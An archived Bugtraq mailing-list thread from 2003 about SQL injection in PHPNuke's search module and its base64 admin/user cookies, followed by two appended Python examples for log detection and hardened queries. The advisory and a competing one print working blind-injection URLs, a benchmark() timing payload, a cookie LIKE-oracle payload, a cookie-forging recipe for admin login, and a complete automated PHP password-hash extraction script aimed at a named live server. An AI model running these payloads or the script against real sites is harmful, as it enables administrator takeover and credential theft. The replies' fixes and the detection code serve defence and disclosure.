91211 2003-02-21  02:45  /355 lines/ Lucas Armstrong <lucas@cgishield.com>
Imported: 2003-02-21  02:45  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <3587>
Subject: PHPNuke SQL Injection
------------------------------------------------------------


PHPNuke SQL Injection 2-18-2003
http://CGIshield.com

How to steal the password hash of the Admin user on PHPnuke 6.0 & 5.6 
windows+linux method #1

PHPnuke, a widely used open-source web portal system, has been found
to contain a remotely exploitable SQL injection bug, which allows
stealing of the administrator's password hash. With the hash, an
attacker may login and gain complete control of the administrative
side of the system.


The bug exists in the search engine included with PHPnuke
(/modules/search/index.php). In this file, a database call is made
without placing quotes around a user supplied variable. Since the
database call selects information from the user table, a hacker can
use a 'select fish' attack. In this type of attack, the hacker can
determine the value of a single character in any given column in the
table specified in the statement. The column of most importance to a
hacker would be the one holding the administrator's encrypted
password. Since the passwords in PHPnuke (and many other programs)
are an md5 hash, there are only 16 possible values for each
character and 32 total characters to expect. Select fishing involves
utilizing the MySQL mid() function to return true if the character
is guessed correctly, thereby returning a set of results to the
screen. If the results show up on the screen, the attacker can
determine that the character is guessed correctly, and then proceed
to guess the next character in the sequence. Any md5 password hash
can be fished in less than 512 (32*16) guesses. When done by hand,
this can take anywhere from 20-30 minutes, but when the process is
automated with a program it can take only a few minutes. One such
program is included at the end of this document.

The first url the hacker would try could look like this:
http://site/modules.php?name=search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,1,1)=6&type=stories

When phpnuke queries the mysql database, the query then looks like
this:

"select s.sid, s.aid, s.informant, s.title, s.time, s.hometext,
s.bodytext, a.url, s.comments, s.topic from nuke_stories s,
nuke_authors a where s.aid=a.aid AND (s.title LIKE '%%' OR
s.hometext LIKE '%%' OR s.bodytext LIKE '%%' OR s.notes LIKE '%%')
AND TO_DAYS(NOW()) - TO_DAYS (time) <= 1 or mid(a.pwd,1,1)=6 ORDER BY
s.time DESC LIMIT 0,10"

It would check the admin table to see if the first character in the
pwd (password) column is equal to a value of '6'. If any admin
password begins with a value of '6', stories written by that admin
will appear on the screen. If no admin password begins with a value
of '6', or the admin has written no stories, then the screen will
list no story results.


example admin's hash: 6a204bd89f3c8348afd5c77c717a097a

will the admin's stories show with the following urls called?

(*note* in version 6.0 a check for '()' in any GET variable was added
on line 36 of mainfile.php, therefore the following data strings
will only work via POST in version 6.0 or later. The exploit
included at the end of this file works via POST.)

modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,1,1)=1&type=stories          No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,1,1)=2&type=stories          No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,1,1)=3&type=stories          No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,1,1)=4&type=stories          No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,1,1)=5&type=stories          No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,1,1)=6&type=stories          Yes
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,1,1)=7&type=stories          No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,1,1)=8&type=stories          No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,1,1)=9&type=stories          No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,1,1)=0&type=stories          No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,1,1)=char(97)&type=stories   No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,1,1)=char(98)&type=stories   No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,1,1)=char(99)&type=stories   No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,1,1)=char(100)&type=stories  No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,1,1)=char(101)&type=stories  No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,1,1)=char(102)&type=stories  No


To guess the next character in the sequence the attacker could use the
following url:
http://site/modules.php?name=search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,2,1)=1&type=stories

and so forth, until all values are determined. When guessing values
from a-f, these values normally would need to be surrounded by
single quotes. This presents a problem for PHP and other
applications which normally escape quotes. To get around this
problem, one could use the mysql char() function which will output
any ascii value, without using quotes. So to guess the letter 'a'
the hacker could use char(97). Here is an example url guessing the
3rd character in the pwd column as 'a':
http://site/modules.php?name=search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,3,1)=char(97)&type=stories


Now that the attacker has determined the password hash of the admin user,
he can base64 encode the hash (which is what phpnuke expects) and
place it in a netscape cookie file, and gain access to the target
site. If the admin's password is 'admin' and the admin's username is
'admin' then you would take the value 'admin:admin:' and base64
encode it, put it in the cookie (the variable of the encoded values
is itself 'admin') and the end result would look similar to this (on
localhost):

lang
english
localhost/html/
1024
1809931264
29595766
4083407360
29522340
*
admin
YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM6
localhost/html/
1024
3858912640
29529535
3993654000
29523500
*



How to steal the password hash of the Admin user on PHPnuke 6.0 & 5.6 
windows+linux method #2

PHPnuke, a widely used open-source web portal system, has been found
to contain a remotely exploitable SQL injection bug, which allows
stealing of the administrator's password hash. With the hash, an
attacker may login and gain complete control of the administrative
side of the system.

The bug exists due to the format of the admin user's cookies. In
PHPnuke the admin credentials are stored in the form:
'username:password:', with the password md5 encrypted, and the
entire string base64 encoded.

Every time a webpage is requested on the site running PHPnuke, the
'admin' cookie variable (which contains the username/password value)
is sent to the script, and every time its validity is checked in the
auth.php file. Here is the key code in auth.php which does the check:

// start code

if(isset($admin) && $admin != "") {
  $admin = base64_decode($admin);
  $admin = explode(":", $admin);
  $aid = "$admin[0]";
  $pwd = "$admin[1]";
  $admlanguage = "$admin[2]";
  if ($aid=="" || $pwd=="") {
    $admintest=0;
    echo "<html>\n";
    echo "<title>INTRUDER ALERT!!!</title>\n";
    echo "<body bgcolor=\"#FFFFFF\" text=\"#000000\">\n\n<br><br><br>\n\n";
    echo "<center><img src=\"images/eyes.gif\" border=\"0\"><br><br>\n";
    echo "<font face=\"Verdana\" size=\"+4\"><b>Get Out!
</b></font></center>\n";
    echo "</body>\n";
    echo "</html>\n";
    exit;
  }
  $result=sql_query("select pwd from ".$prefix."_authors where 
aid='$aid'", $dbi);
  if(!$result) {
        echo "Selection from database failed!";
        exit;
  } else {
    list($pass)=sql_fetch_row($result, $dbi);
    if($pass == $pwd && $pass != "") {
        $admintest = 1;
    }
  }
}

// end code


As you notice, the $admin variable is first base64_decoded(), and
split into the two variables $aid and $pwd. The security problem
lies in the fact that when a string containing one or more single
quotes is base64 encoded, and submitted to the site, it will bypass
PHP's automatic escaping of GPC variables. Since no additional
checks are done to defend against an sql injection, an attacker is
free to modify the select query and determine the admin password
hash.


A more advanced version of the select fish attack must take
place. This is because in order to determine a certain character
value, the script has to respond in a different way if the character
guess is correct. This is not naturally possible in PHPnuke, but it
can be accomplished using mySQL's benchmark() to give a delayed page
response when the character is guessed correctly.

Now that you are aware of where the sql injection attack occurs, let
me show the process of how this attack would work by modifying the
select query:

(`select pwd from ".$prefix."_authors where aid='$aid'`)


let's say the 'admin' user has a password hash of
'21232f297a57a5a743894a0e4a801fc3'. When we modify the query to check
if the first digit of the 'admin' password hash is equal to '1', we
get the following result:


mysql> select pwd from nuke_authors where aid='admin' 
and if(mid(pwd,1,1)=1,benchmark(10000000,encode("AAAA","AAAA")),1)/*;
+----------------------------------+
| pwd                              |
+----------------------------------+
| 21232f297a57a5a743894a0e4a801fc3 |
+----------------------------------+
1 row in set (0.00 sec)


The small query execution time signifies an incorrect guess. Look
what happens when the attacker correctly guesses that the first
character of the 'admin' password hash is '2':

mysql> select pwd from nuke_authors where aid='admin' and if(mid(pwd,1,1)
=2,benchmark(20000000, encode("AAAA","AAAA")),1)/*;
Empty set (11.11 sec)

The attacker can prolong the execution time to his or her liking when
a correct guess occurs by raising the first argument to the
benchmark() function. By the different server response time, an
attacker can determine the admin's password hash one character at
a time.


<?php

########## PHPnuke Auto-SelectFish Attacker
########## David@cgishield.com
########## works on phpnuke 5.6 and 6.0

// To use this program, simply upload it to a php enabled webserver,
// and execute. If php times out before the whole password hash is
// determined, adjust the maximum script execution time in php.ini
// Also, replace following with correct values:

$server="www.phpnuke.org";
$script="/modules.php";

// Title of a story created specifically by the admin who is being hacked.
$data_to_match="Revolution";
$admin_account_name="nukelite";
$beginchar="1";
$endchar="33";



$admin_account_name=urlencode($admin_account_name);
$data_to_match=urlencode($data_to_match);

$checkchar[0]="char(48)";
$checkchar[1]="char(49)";
$checkchar[2]="char(50)";
$checkchar[3]="char(51)";
$checkchar[4]="char(52)";
$checkchar[5]="char(53)";
$checkchar[6]="char(54)";
$checkchar[7]="char(55)";
$checkchar[8]="char(56)";
$checkchar[9]="char(57)";
$checkchar['a']="char(97)";
$checkchar['b']="char(98)";
$checkchar['c']="char(99)";
$checkchar['d']="char(100)";
$checkchar['e']="char(101)";
$checkchar['f']="char(102)";

for($i=$beginchar;$i<$endchar;$i++){
reset($checkchar);
while (list($i2, $i2val) = @each($checkchar)){

$vars="name=Search&query=$data_to_match&topic=&category=&author=$admin_account_name&days=1000+and+mid(a.pwd,$i,1)=$checkchar[$i2]&type=stories";
	$data=sendToHost("$server",'post',"$script","$vars");

	if (eregi("No matches found to your query","$data")){

	}
else{

echo("<br>$i= $i2"); flush();break;}

	}

}


function sendToHost($host,$method,$path,$data,$useragent=1)
{
	$method = strtoupper($method);
	$fp = fsockopen($host,80);
	fputs($fp, "$method $path HTTP/1.1\n");
	fputs($fp, "Host: $host\n");
	fputs($fp, "Content-type: application/x-www-form-urlencoded\n");
	fputs($fp, "Content-length: " . strlen($data) . "\n");
	if ($useragent)
		fputs($fp, "User-Agent: Mozilla\n");
	fputs($fp, "Connection: close\n\n");
	if ($method == 'POST')
		fputs($fp, $data);
	while (!feof($fp))
		$buf .= fgets($fp,128);
	fclose($fp);
for($slow=0;$slow<100;$slow++){}

	return $buf;
}


?>


Vulnerability discovered by: David Zentner, david@cgishield.com
http://CGIshield.com
(91211) /Lucas Armstrong <lucas@cgishield.com>/(reflowed)
Comment in text 91316 by Martin Eiszner <martin@websec.org>
Comment in text 91319 by David Walker <bugtraq@grax.com>
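An added example, not part of the advisory or of PHPnuke: detection logic for the request patterns described above (non-numeric values in the search module's integer parameters, select-fish enumeration from one client, and SQL fragments hidden inside the base64 `admin`/`user` session cookies), run over constructed log lines in a format assumed for this example, since ordinary access logs record neither POST bodies nor cookies.

```python
import base64
import binascii
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Constructed log format for this example (not Apache's; access logs lack POST
# bodies and cookies):  time client method path "query-or-body" "cookie-header"
LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)" "([^"]*)"$')

# Search-module parameters that the advisory shows interpolated unquoted;
# legitimate requests only ever send digits (or nothing) here.
NUMERIC_PARAMS = {"days", "category", "topic"}
# Session cookies whose base64 wrapping carries quotes past magic_quotes.
SESSION_COOKIES = {"admin", "user"}
# Fragments used by the select-fish, benchmark() and LIKE variants above.
SQL_RE = re.compile(
    r"\b(?:mid|substring|char|benchmark|if|sleep)\s*\(|\blike\b|\bunion\b|/\*|--|'",
    re.IGNORECASE)
# Distinct values of one numeric parameter from one client before we call it
# enumeration; the advisory needs up to 16 probes per hash character.
ENUM_THRESHOLD = 4


def parse_line(line):
    """Split one constructed log line into client, decoded params and cookies."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, client, method, path, query, cookie_hdr = m.groups()
    # parse_qs undoes the '+' and %xx encoding, so 'mid(a.pwd,1,1)' is visible.
    params = {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}
    cookies = {}
    for part in cookie_hdr.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name] = value
    return {"ts": ts, "client": client, "method": method, "path": path,
            "params": params, "cookies": cookies}


def decode_session_cookie(value):
    """Return the 'name:hash:lang' fields of a PHPnuke cookie, or None if not base64."""
    try:
        raw = base64.b64decode(value, validate=True).decode("latin-1")
    except (binascii.Error, ValueError):
        return None
    return raw.split(":")


def scan(lines):
    """Return (client, kind, field, value) findings for the log lines given."""
    findings = []
    seen = defaultdict(set)  # (client, param) -> distinct values sent
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec["params"].items():
            if name not in NUMERIC_PARAMS:
                continue
            seen[(rec["client"], name)].add(value)
            if not re.fullmatch(r"\d*", value):
                kind = "sqli_pattern" if SQL_RE.search(value) else "non_numeric"
                findings.append((rec["client"], kind, name, value))
        for name, value in rec["cookies"].items():
            if name not in SESSION_COOKIES:
                continue
            fields = decode_session_cookie(value)
            if fields is None:
                findings.append((rec["client"], "cookie_not_base64", name, value))
            elif not re.fullmatch(r"[\w.-]{0,25}", fields[0]) or SQL_RE.search(fields[0]):
                # the first field becomes aid/uid inside the authors/users query
                findings.append((rec["client"], "cookie_sqli", name, fields[0]))
    for (client, name), values in seen.items():
        if len(values) >= ENUM_THRESHOLD:
            findings.append((client, "enumeration", name, str(len(values))))
    return findings


def sample_log():
    """Constructed lines: a normal search, four select-fish probes from one
    client (PHPnuke 6.0's '()' check pushes these to POST), a well-formed admin
    cookie and a user cookie of the LIKE-oracle form."""
    admin_ok = base64.b64encode(b"admin:21232f297a57a5a743894a0e4a801fc3:").decode()
    user_bad = base64.b64encode(b"2' AND pass LIKE 'a%' OR uid='5:x:1234").decode()
    lines = ['2003-02-21T02:45:00 10.0.0.9 GET /modules.php '
             '"name=Search&query=linux&days=30&type=stories" ""']
    for code in (49, 50, 51, 52):
        lines.append(f'2003-02-21T02:46:{code} 10.0.0.5 POST /modules.php '
                     f'"name=Search&query=&days=1+or+mid(a.pwd,1,1)=char({code})'
                     f'&type=stories" ""')
    lines.append(f'2003-02-21T02:47:00 10.0.0.9 GET /admin.php "" '
                 f'"lang=english; admin={admin_ok}"')
    lines.append(f'2003-02-21T02:48:00 10.0.0.5 GET /index.php "" "user={user_bad}"')
    return lines


if __name__ == "__main__":
    for finding in scan(sample_log()):
        print(finding)
```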
91316 2003-02-21  22:00  /57 lines/ Martin Eiszner <martin@websec.org>
Imported: 2003-02-21  22:00  by Brevbäraren
External recipient: Lucas Armstrong <lucas@cgishield.com>
Recipient: Bugtraq (import) <3592>
Comment on text 91211 by Lucas Armstrong <lucas@cgishield.com>
Subject: Re: PHPNuke SQL Injection
------------------------------------------------------------

hola,

On 20 Feb 2003 20:36:11 -0000
Lucas Armstrong <lucas@cgishield.com> wrote:

> To get around this problem, one could use the mysql char() 
> function which will output any ascii value, without using quotes. So to 
> guess the letter 'a' the hacker could use char(97). Here is an example url 
> guessing the 3rd character in the pwd column as 'a':
> http://site/modules.php?
> name=search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,3,1)=char
> (97)&type=stories

JFYI:

this may be off topic but it is worth mentioning .. a couple of months ago
we found out that the mysql char() function can be used within the
"like() - function" to place quotes.

this may help somebody doing sql-injection in a "quote-stripped :-)"
environment.

example query:
---*--- select id,Name,password from Users where id = 1 and (user()
like "%root%");
---*---

and now "without" quotes:
---*--- select id,Name,password from Users where id = 1 and (user()
like char(37,114,111,111,116,37));
---*---


...


nice day,


mEi


-- 
WebSec.org / Martin Eiszner
Gurkgasse 49/Top14
1140 Vienna
Austria / EUROPE

mei@websec.org
http://www.websec.org
tel: 0043 699 121772 37
(91316) /Martin Eiszner <martin@websec.org>/(reflowed)
91319 2003-02-21  22:35  /13 lines/ David Walker <bugtraq@grax.com>
Imported: 2003-02-21  22:35  by Brevbäraren
External recipient: bugtraq@securityfocus.com
External replies to: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <3594>
Comment on text 91211 by Lucas Armstrong <lucas@cgishield.com>
Subject: Re: PHPNuke SQL Injection / General SQL Injection
------------------------------------------------------------
When programming a system that creates sql strings based on passed in
integers, i.e. where some_int=$variable_from_querystring, you must
always do a check to confirm that the variable contains only numeric
data.

An alternate fix on sql servers that allow the format
where some_int='1234' -- (quoted numbers) would be to do where
some_int='replace($variable_from_querystring,"'","''")'. This would
cause a more than likely harmless error to occur whenever a character
occurs within the passed in numeric/integer variable.
(91319) /David Walker <bugtraq@grax.com>/-(reflowed)
91334 2003-02-22  00:00  /243 lines/ Oriol Carreas <uri@7a69ezine.org>
Imported: 2003-02-22  00:00  by Brevbäraren
External recipient: bugtraq@securityfocus.com
External replies to: uri@7a69ezine.org
Recipient: Bugtraq (import) <3604>
Subject: RE: PHPNuke SQL Injection
------------------------------------------------------------

I don't like to claim the authorship of bugs, because it is not
possible to clarify who discovered/exploited some bug first because
sometimes we are too lazy to publish them for any reason. But this
is a special case because the person that claims the authorship
of the TWO "PhpNuke SQL Injection" bugs has discovered them at the same
time as me and exploits them _exactly_ the same way as me, so I
think that it can not be a coincidence.

I've been testing the methods of exploitation this last week and it
is possible that "David Zenter" (the person who wrote that advisory)
found that kind of attack, programmed an exploit for them and
finally wrote the advisory stealing the authorship of these 2 bugs.
I am not sure of that so I would like him to answer.

I discovered the $user bug one month ago (in fact I searched the
website and I found that RFP found them some years ago, but he
didn't publish a successful way to exploit them).
I contacted Francisco Bucci, the author of PhpNuke, and I suggested
some patches to him (and he published the patches on his website)
but phpnuke still had a lot of bugs so I waited to finish my job to
publish them.

PhpNuke has been here for a long time so I don't believe that a
person finds the same _TWO_ bugs as me and exploits them in the
same way, so I want "David Zenter" to clarify that.

I am developing other vulnerabilities; what is very strange for
me is that the 2 ones that I've developed are the ones that
"David Zenter" published.

Now I attach the two advisories and the two exploits that I had
written for these bugs; judge for yourself if you think that this
can be a coincidence.

PS.- Excuse my poor english :)

;==================================================================
PHPNUKE is_user || is_admin VULNERABILITY
;==================================================================

General Data :
--------------
        Application     : PhpNuke.
        Versions        : <= 6.5 ( without the patch).
        Vulnerability   : Sql injection in the cookies user and admin.
                        : Access to the application at administration level
                          OR guess any user password.

Introduction:
-------------
        PhpNuke is a well known content management system programmed
in PHP by Francisco Bucci, a lot of people use it because it is very
easy to install and manage.

        PhpNuke doesn't check the integrity of the cookies "user" and
"admin" that it uses to follow sessions, so it is possible to inject
SQL code and get the administration password. These cookies are
encoded using base64 so the "magic quotes" protection of PHP is not
working.

Vulnerability:
--------------

       The Vulnerable function is found in the file "mainfile.php" :

-------------------------------------------------------------------------------
        function is_user($user) {
            global $prefix;
            if(!is_array($user)) {
                $user = base64_decode($user);
                $user = explode(":", $user);
                $uid = "$user[0]";
                $pwd = "$user[2]";
            } else {
                $uid = "$user[0]";
                $pwd = "$user[2]";
            }
            $result=mysql_query("select pass from $prefix"._users."
                                                  where uid='$uid'");

            list($pass)=mysql_fetch_row($result);
            if($pass == $pwd && $pass != "") {
                return 1;
            }            return 0;
        }
-------------------------------------------------------------------------------

        The function is_admin is almost like the other one.

        There is no other integrity check to the cookie $user in the
phpnuke code so it is possible to inject SQL code in this way :

        $user = base64_encode("uiduser'
CODIGOSQL:noimporant:passowrd");

        Most PhpNuke websites use mysql 3.x so it is not possible to
use UNION so initially it seems difficult to exploit.

Way to exploit:
---------------
        To get information from that query we need a valid PhpNuke
user, but that is very easy because PhpNuke lets anybody create a
user easily. Once we have a valid userid and a valid password we can
send a query like:

        SELECT pass from nuke_users where uid='<target_uid>'
                AND  pass LIKE '<test>' OR uid='<our_uid>'

        This SELECT will give the password of "target_uid" if <test>
is correct or our password if that test is not correct. So we can
retrieve information from that query if we see if we are logged in or
not. This allows us to bruteforce the target password with LIKE's (
we only check one character at a time )

        PhpNuke uses md5 in version 6.x ( crypt in versions 5.x )
that gives an average of 32*(16/2) = 256 tries to get a valid
password.

        I have tested this method and it is possible to get a valid
password within 10 minutes.

Example of a cookie using this method:

        user = base64_encode("2' AND pass LIKE 
'a12bc___________________________' OR 
uid='5612:noimportant:1234567889012345678901234567890ab");

	Where '_' in LIKE's means any character.

Using that method we can find the cookie of _any_ user in phpnuke, in
phpnuke 5.x (I think) it is not possible to go further but in
phpnuke 6.x we can use the fact that the admin password is stored in
nuke_authors and in nuke_users.

In the test that I've done, the uid=2 in nuke_users is the
uid=1=admin in nuke_authors.


Patches:
--------
        There is a patch for this vulnerability on PhpNuke's website
but I must say that PhpNuke seems to have some other
vulnerabilities not yet published.

Credit:
--------
        I found this vulnerability one month ago, I didn't believe
that this vulnerability could be in PhpNuke!!, because it is very
used and a lot of people had already audited it before me, so I
searched in google to find that vulnerability. I found that RFP had
discovered that some years ago, in PhpNuke 4.x !!! WooW, and it is
still in PhpNuke!! :? RFP didn't find a way to exploit that, but he
discovered this vuln.


;==================================================================
PHPNUKE Search vulnerability
;==================================================================

General data :
--------------
        Application     : PhpNuke.
        Versions        : <= 6.5 ( without the patch).
        Vulnerability   : Sql injection in the search form.
                        : Access to the application at administration level
                          OR guess any user password.

Introduction:
-------------
        PhpNuke is a well known content management system programmed
in PHP by Francisco Bucci, a lot of people use it because it is very
easy to install and manage.

        PhpNuke doesn't check that the parameter "category" in the search
form is numeric, and when it builds the SQL query it does not
enclose it with quotes, so it is easy to inject SQL code; quotes
will not be allowed in this code because the "magic quotes"
protection of phpnuke would add slashes to them.

Vulnerability:
---------------

        The vulnerable code is in modules/Search/index.php in PhpNuke 6.x
                           and in /search.php in PhpNuke 5.x

-------------------------------------------------------------------------------
  if ($category > 0) {
                    $categ = "AND catid=$category ";
                } elseif ($category == 0) {
                    $categ = "";
                }
  $q = "select s.sid, s.aid, s.informant, s.title, s.time, s.hometext, 
s.bodytext,
        a.url, s.comments, s.topic from ".$prefix. "_stories s, 
".$prefix."_authors
        a where s.aid=a.aid $queryalang $categ";
-------------------------------------------------------------------------------

        This query is done using the nuke_authors table, ( with the
variable 'a' ). So it is possible to get the admin password using a
technique similar to the last advisory.


Exploitation Method:
-------------------
        As I said in the last advisory PhpNuke mainly uses MySQL 3.x
so it is not possible to use UNION's to get the admin password ( in
this case it would be possible to get the admin password string
directly with unions )

        But we can use a similar technique to the last advisory but
without using quotes, if we inject :

        AND MID(a.pwd,characternumber,1) = CHAR( characterascii)

        If characterascii is valid the query will give us the search
result otherwise it won't give us anything. This allows us to
bruteforce the administration password, which can be done in less
than 10 minutes.

        Other parameters can be retrieved using this technique:

                * a.uname : needed to log in phpnuke using the admin
                cookie.
                * user()  : mysql user, if it is root we can use some
                techniques like creating a file etc ...
                * database()
                * use your imagination ...

Patches:
--------
        As far as I am concerned there is not an official patch, but
a workaround is very easy, you just have to quote the 'category'
parameter and test that it is a numeric field.

Credit:
--------
        I don't know anybody who has already discovered that. If you
feel that I am not correct please contact me.

        Vulnerability developed by :    Oriol Carreras - <uri@7a69ezine.org>




-- 
>===============================
>
> http://ripe.7a69ezine.org
>===============================
(91334) /Oriol Carreas <uri@7a69ezine.org>/(reflowed)
Attachment (application/x-tgz) in text 91335
Attachment (application/x-tgz) in text 91336
91335 2003-02-22  00:00  /16 lines/ Oriol Carreas <uri@7a69ezine.org>
Attachment filename: "search.tar.gz"
Imported: 2003-02-22  00:00  by Brevbäraren
External recipient: bugtraq@securityfocus.com
External replies to: uri@7a69ezine.org
Recipient: Bugtraq (import) <3605>
Attachment (text/plain) to text 91334
Subject: Attachment (search.tar.gz) to: RE: PHPNuke SQL Injection
------------------------------------------------------------
(91335) /Oriol Carreas <uri@7a69ezine.org>/(reflowed)
91336 2003-02-22  00:00  /17 lines/ Oriol Carreas <uri@7a69ezine.org>
Attachment filename: "user.tar.gz"
Imported: 2003-02-22  00:00  by Brevbäraren
External recipient: bugtraq@securityfocus.com
External replies to: uri@7a69ezine.org
Recipient: Bugtraq (import) <3606>
Attachment (text/plain) to text 91334
Subject: Attachment (user.tar.gz) to: RE: PHPNuke SQL Injection
------------------------------------------------------------
(91336) /Oriol Carreas <uri@7a69ezine.org>/(reflowed)
91520 2003-02-24  19:59  /31 lines/  <alias@securityfocus.com>
Imported: 2003-02-24  19:59  by Brevbäraren
Recipient: Bugtraq (import) <3642>
Subject: Re[2]: PHPNuke SQL Injection / General SQL Injection
------------------------------------------------------------
MightyE,

In response to your mail of Saturday 22 February 2003 at 21:20:29:

M> Actually, user supplied input from $_COOKIES, $_POST, and $_GET
M> comes slash-escaped, so if the user enters
M> ' or 1=1
M> as their input, the sql statement will look like
M> where some_int='\' or 1=1'
M>       [..snip..]
M> function escape($input){
M>     if (get_magic_quotes_gpc()) return $input;
M>     return addslashes($input);
M> }
M>       [..snip..]


Better still, always do this:

        ...WHERE id = ". intval($userinput) ." AND...

which doesn't rely on local configuration, magicquotes etc., and
resolves to (e.g.) "id = 0" when the $userinput is bad or missing.

Safe, simple, portable and effective.


-- 
Best regards,
James.
(91520) / <alias@securityfocus.com>/----------------
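As an added example, not PHPnuke's code or anyone's in the thread, here are both checks discussed above ported to Python with sqlite3 (constructed schema and rows; sqlite's substr()/char() stand in for MySQL's mid()/char()): the search module's unquoted `days` value and the base64 user cookie from Oriol's advisory, each in vulnerable form next to the numeric validation and bound parameters that James and David Walker recommend.

```python
import base64
import binascii
import hmac
import re
import sqlite3

# Constructed data: the advisory's md5('admin') hash for the admin, and an
# arbitrary 32-hex "hash" for a self-registered attacker account (uid 5).
ADMIN_HASH = "21232f297a57a5a743894a0e4a801fc3"
ATTACKER_HASH = "e10adc3949ba59abbe56e057f20f883e"


def make_db():
    """In-memory stand-in for the nuke_* tables used in the thread."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(f"""
        create table nuke_authors(aid text, pwd text);
        insert into nuke_authors values ('admin', '{ADMIN_HASH}');
        create table nuke_stories(sid integer, aid text, title text, age_days integer);
        insert into nuke_stories values (1, 'admin', 'Revolution', 400);
        create table nuke_users(uid integer, uname text, pass text);
        insert into nuke_users values (2, 'admin', '{ADMIN_HASH}');
        insert into nuke_users values (5, 'attacker', '{ATTACKER_HASH}');
    """)
    return conn


# --- search module: the unquoted numeric parameter (days / category) ---------

def search_vulnerable(conn, days):
    """Mirror of the advisory's query: the user value is glued in unquoted, so
    '1 or substr(a.pwd,1,1)=char(50)' turns the result list into a yes/no
    oracle on the admin hash (substr/char are sqlite's mid/char)."""
    sql = ("select s.title from nuke_stories s, nuke_authors a "
           "where s.aid = a.aid and s.age_days <= " + days)
    return [row[0] for row in conn.execute(sql)]


def validate_days(days):
    """The check David Walker and James ask for: accept only a small
    non-negative integer; return it as int, or None for anything else."""
    return int(days) if re.fullmatch(r"\d{1,6}", days) else None


def search_hardened(conn, days):
    value = validate_days(days)
    if value is None:
        raise ValueError("days must be a non-negative integer")
    # Bound parameter: the driver never lets the value become SQL text.
    sql = ("select s.title from nuke_stories s, nuke_authors a "
           "where s.aid = a.aid and s.age_days <= ?")
    return [row[0] for row in conn.execute(sql, (value,))]


# --- cookie check: base64('uid:x:hash') as in mainfile.php's is_user() -------

def make_cookie(uid, pwd):
    """Build a PHPnuke-style user cookie (constructed helper for the tests)."""
    return base64.b64encode(f"{uid}:x:{pwd}".encode("latin-1")).decode()


def split_cookie(cookie):
    """base64_decode + explode(':'): base64 carries quotes straight past
    magic_quotes, so whatever comes out must be validated here, by the app."""
    return base64.b64decode(cookie).decode("latin-1").split(":")


def is_user_vulnerable(conn, cookie):
    uid, _, pwd = (split_cookie(cookie) + ["", ""])[:3]
    row = conn.execute("select pass from nuke_users where uid='%s'" % uid).fetchone()
    # With the LIKE-oracle cookie, a correct guess returns the target's pass
    # (login fails) and a wrong one returns our own (login succeeds): one bit leaks.
    return row is not None and row[0] == pwd


def is_user_hardened(conn, cookie):
    try:
        uid, _, pwd = (split_cookie(cookie) + ["", ""])[:3]
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return False
    # Validate the decoded fields against their expected shape, then bind them;
    # the oracle disappears because a malformed uid is rejected before any query.
    if not re.fullmatch(r"\d{1,10}", uid) or not re.fullmatch(r"[0-9a-f]{32}", pwd):
        return False
    row = conn.execute("select pass from nuke_users where uid = ?", (int(uid),)).fetchone()
    return row is not None and hmac.compare_digest(row[0], pwd)
```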